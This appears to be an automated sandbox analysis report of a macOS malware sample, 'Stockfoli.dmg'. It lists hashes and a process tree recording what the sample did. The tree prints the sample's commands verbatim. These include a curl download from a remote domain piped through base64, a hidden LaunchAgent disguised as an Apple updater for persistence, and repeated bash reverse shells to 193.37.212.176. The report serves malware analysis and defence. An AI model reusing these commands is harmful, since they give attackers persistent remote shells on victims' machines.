Analysis
-
max time network
159s -
platform
macos_amd64 -
resource
macos -
submitted
24-06-2021 12:53
Static task
static1
General
-
Target
Stockfoli.dmg
-
Size
11.2MB
-
MD5
22a526c0658e542f24358178fb079c38
-
SHA1
352985598e83b42e99dfcb19636227335a18f8c0
-
SHA256
118ba3642fdff254e37aee1ff9552fe189f7b1f8d5302d51c5010335acce6c2c
-
SHA512
73c37880c044235028708e81d840120e78951a5ab4c100338ee958bce2409890a3c9dee75eab95dd8e37e98bd73c4561ff7a3413669527fa5ef458cce26971af
Malware Config
Signatures
Processes
-
/bin/sh | sh -c "sudo open /Volumes/Stockfoli/Stockfoli.app" | 1⤵PID:539
-
/bin/bash | sh -c "sudo open /Volumes/Stockfoli/Stockfoli.app" | 1⤵PID:539
-
/usr/bin/sudo | sudo open /Volumes/Stockfoli/Stockfoli.app | 1⤵PID:539
-
/usr/bin/open | open /Volumes/Stockfoli/Stockfoli.app | 2⤵PID:540
-
-
/Volumes/Stockfoli/Stockfoli.app/Contents/MacOS/Stockfoli | /Volumes/Stockfoli/Stockfoli.app/Contents/MacOS/Stockfoli | 1⤵PID:541
-
/bin/bash | /bin/bash -c "nohup sh '/Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh' </dev/null >/dev/null 2>&1 &" | 1⤵PID:550
-
/usr/bin/nohup | nohup sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh | 2⤵PID:551
-
-
/usr/bin/sh | sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh | 2⤵PID:551
-
-
/bin/sh | sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh | 2⤵PID:551
-
-
/bin/bash | sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh | 2⤵PID:551
-
/usr/bin/curl | curl -ks "http://owpqkszz.info/link.php?run&185.220.101.144" | 3⤵PID:573
-
-
/usr/bin/base64 | base64 --decode | 3⤵PID:575
-
-
/bin/cat | cat /tmp/.com.apple.upd.plist | 3⤵PID:576
-
-
/bin/cp | cp /tmp/.com.apple.upd.plist /Users/run/Library/LaunchAgents/.com.apple.upd.plist | 3⤵PID:577
-
-
/bin/cat | cat /Users/run/Library/LaunchAgents/.com.apple.upd.plist | 3⤵PID:578
-
-
/bin/launchctl | launchctl load /tmp/.com.apple.upd.plist | 3⤵PID:579
-
-
/usr/bin/screen | screen -d -m bash -c "bash -i >/dev/tcp/193.37.212.176/25733 0>&1" | 3⤵PID:584
-
-
-
/usr/bin/whoami | whoami | 1⤵PID:554
-
/usr/bin/tr | tr -dc "[:alnum:].\\r" | 1⤵PID:556
-
/usr/bin/tr | tr "[:upper:]" "[:lower:]" | 1⤵PID:557
-
/usr/bin/curl | curl -s ipecho.net/plain | 1⤵PID:560
-
/bin/bash | /bin/bash -c "nohup '/Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio' </dev/null >/dev/null 2>&1 &" | 1⤵PID:561
-
/usr/bin/nohup | nohup /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio | 2⤵PID:562
-
-
/Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio | /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio | 2⤵PID:562
-
-
/bin/bash | /bin/bash -c "screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25734 0>&1'" | 1⤵PID:563
-
/usr/bin/screen | screen -d -m bash -c "bash -i >/dev/tcp/193.37.212.176/25734 0>&1" | 1⤵PID:563
-
/usr/bin/login | login -pflq run /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25734 0>&1" | 1⤵PID:565
-
/bin/bash | bash -c "bash -i >/dev/tcp/193.37.212.176/25734 0>&1" | 2⤵PID:568
-
/bin/bash | bash -i | 3⤵PID:569
-
-
-
/bin/bash | /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25735 0>&1" | 1⤵PID:566
-
/bin/bash | bash -i | 2⤵PID:567
-
-
/usr/bin/tr | tr -dc "[:alnum:].\\r" | 1⤵PID:571
-
/usr/bin/tr | tr "[:upper:]" "[:lower:]" | 1⤵PID:572
-
/bin/launchctl | launchctl list | 1⤵PID:582
-
/usr/bin/grep | grep upd | 1⤵PID:583
-
/usr/bin/login | login -pflq run /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25733 0>&1" | 1⤵PID:589
-
/bin/bash | bash -c "bash -i >/dev/tcp/193.37.212.176/25733 0>&1" | 2⤵PID:591
-
/bin/bash | bash -i | 3⤵PID:592
-
-
-
/bin/bash | /bin/bash -c "screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25736 0>&1'" | 1⤵PID:615
-
/usr/bin/screen | screen -d -m bash -c "bash -i >/dev/tcp/193.37.212.176/25736 0>&1" | 1⤵PID:615
-
/usr/bin/login | login -pflq run /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25736 0>&1" | 1⤵PID:617
-
/bin/bash | bash -c "bash -i >/dev/tcp/193.37.212.176/25736 0>&1" | 2⤵PID:618
-
/bin/bash | bash -i | 3⤵PID:619
-
-
Network
MITRE ATT&CK Matrix
Downloads
-
MD5
d1ec6e05e4d46e06768d1e57bbe4a0e1
SHA1 ee6e20dcf2682bdf84d0614287c8053cc71fd744
SHA256 be8b6549da925f285307b17c616a010a9418af70d090ed960ade575ce27c7787
SHA512 a8903122038bd063d6094a234167e008840dfbdee4d16342c534c623d5642ab9a6a3ebf7138f462909d32ea2c01c3ea7c045ba6aa9e06a551b4a0754c3f2742b
-
MD5
d1ec6e05e4d46e06768d1e57bbe4a0e1
SHA1 ee6e20dcf2682bdf84d0614287c8053cc71fd744
SHA256 be8b6549da925f285307b17c616a010a9418af70d090ed960ade575ce27c7787
SHA512 a8903122038bd063d6094a234167e008840dfbdee4d16342c534c623d5642ab9a6a3ebf7138f462909d32ea2c01c3ea7c045ba6aa9e06a551b4a0754c3f2742b
-
MD5
d1ec6e05e4d46e06768d1e57bbe4a0e1
SHA1 ee6e20dcf2682bdf84d0614287c8053cc71fd744
SHA256 be8b6549da925f285307b17c616a010a9418af70d090ed960ade575ce27c7787
SHA512 a8903122038bd063d6094a234167e008840dfbdee4d16342c534c623d5642ab9a6a3ebf7138f462909d32ea2c01c3ea7c045ba6aa9e06a551b4a0754c3f2742b
-
MD5
d1ec6e05e4d46e06768d1e57bbe4a0e1
SHA1 ee6e20dcf2682bdf84d0614287c8053cc71fd744
SHA256 be8b6549da925f285307b17c616a010a9418af70d090ed960ade575ce27c7787
SHA512 a8903122038bd063d6094a234167e008840dfbdee4d16342c534c623d5642ab9a6a3ebf7138f462909d32ea2c01c3ea7c045ba6aa9e06a551b4a0754c3f2742b
-
MD5
ebb0a7faa9956546a1e4992db15c1f89
SHA1 9abe892e93d3605337dc84ba8f7573899b0585e5
SHA256 411eb63035d57f9bb853e0327a91f2ad6ae556acd188080a30c45554f4f3b402
SHA512 7303bf0471741cf275f0549903b8d6bd63df61ff9e83724ba15ca5f35f0902ac92e9d1b5e485bc29a765d58309b146a12af77eb9f66e4b1a5d729a58fc4db1eb
-
MD5
1a2c1acc6fc4f2300a663be1f037a8d3
SHA1 ea7570da86c520cfde9ca1ae37c3a538948ad324
SHA256 f9ae2bfd1327a91fd3702a2ea67cb268a26828f67c40bd440e95df83412566ab
SHA512 d698402262f96f375641b1d4d3e8decb1b62b71b3c93484c9a50c1f25d637408fc0a5a23a79eb44cf1674a493ebf0f5a827079ab48a615e41994b84fbbeffd1d
-
MD5
3f7e6c6f205752cb986504166b1b3037
SHA1 d3e6925bf8f0da26725effa98caf7d54876111fb
SHA256 bb635b4827e77b2037a16333da358af85ff62905a44b27b8cee63b67a1b26259
SHA512 73d59adba3fcd4f60cb92aa53d1d4b2978a319bf90663aeb99652900b1bae62b473d54d91601cc1d1b976503b9b20018616c9b727232581a68a41daa4d2d55fd
-
MD5
f4ebc88a7d81289168033c588c03c2a5
SHA1 dd3f91fb830a70c6f1cc1f41cd25d1ad2e9470dc
SHA256 16cf58feb19a0877dc7e248042012d40cb036df8638ec29da7defe5457c64459
SHA512 f5e709b27ecd7f48e9b54710ae93313e3587f9fe8c8eef3a9ea2e1f63e9cb2c69820734bcd418a572996d823b173e79739b20c37bbf998fd0d5243b180ab95c9
-
MD5
c17888dc849760d8b3a0f9a9e7bf2d77
SHA1 9dde4a42c8a59a5f1798dceb6e09c8e61094b504
SHA256 d1dd27a95370338a0e79c7c25189d551a0c2c1a4bb25f7bad99e38406c8a72f1
SHA512 7432f19f04728afb2dd192ce00fce477bda2a1687feee8be9299d66b7cd58023837dafa06d45dd9598ff63ccd8bb275e7539d89e6fb3ddf7cd69dbec9abf9143
-
MD5
42736086060db6e7fc1f3a69eded83db
SHA1 3d6e08dbb4a92335369e2a40f1586a8154db7233
SHA256 50e9da2d41889df1f86dd9fef667c4ff836e9b640789817ee813b6b7a6ed7e4a
SHA512 c69b8e40ef6d806a23ca6d8bb94aa033f19f710e48761bf7ce1e1f5a729c5c495358b09a4bbf802c1040304acec9b899d83f79ecc12e9ef019b0e2ce5259c129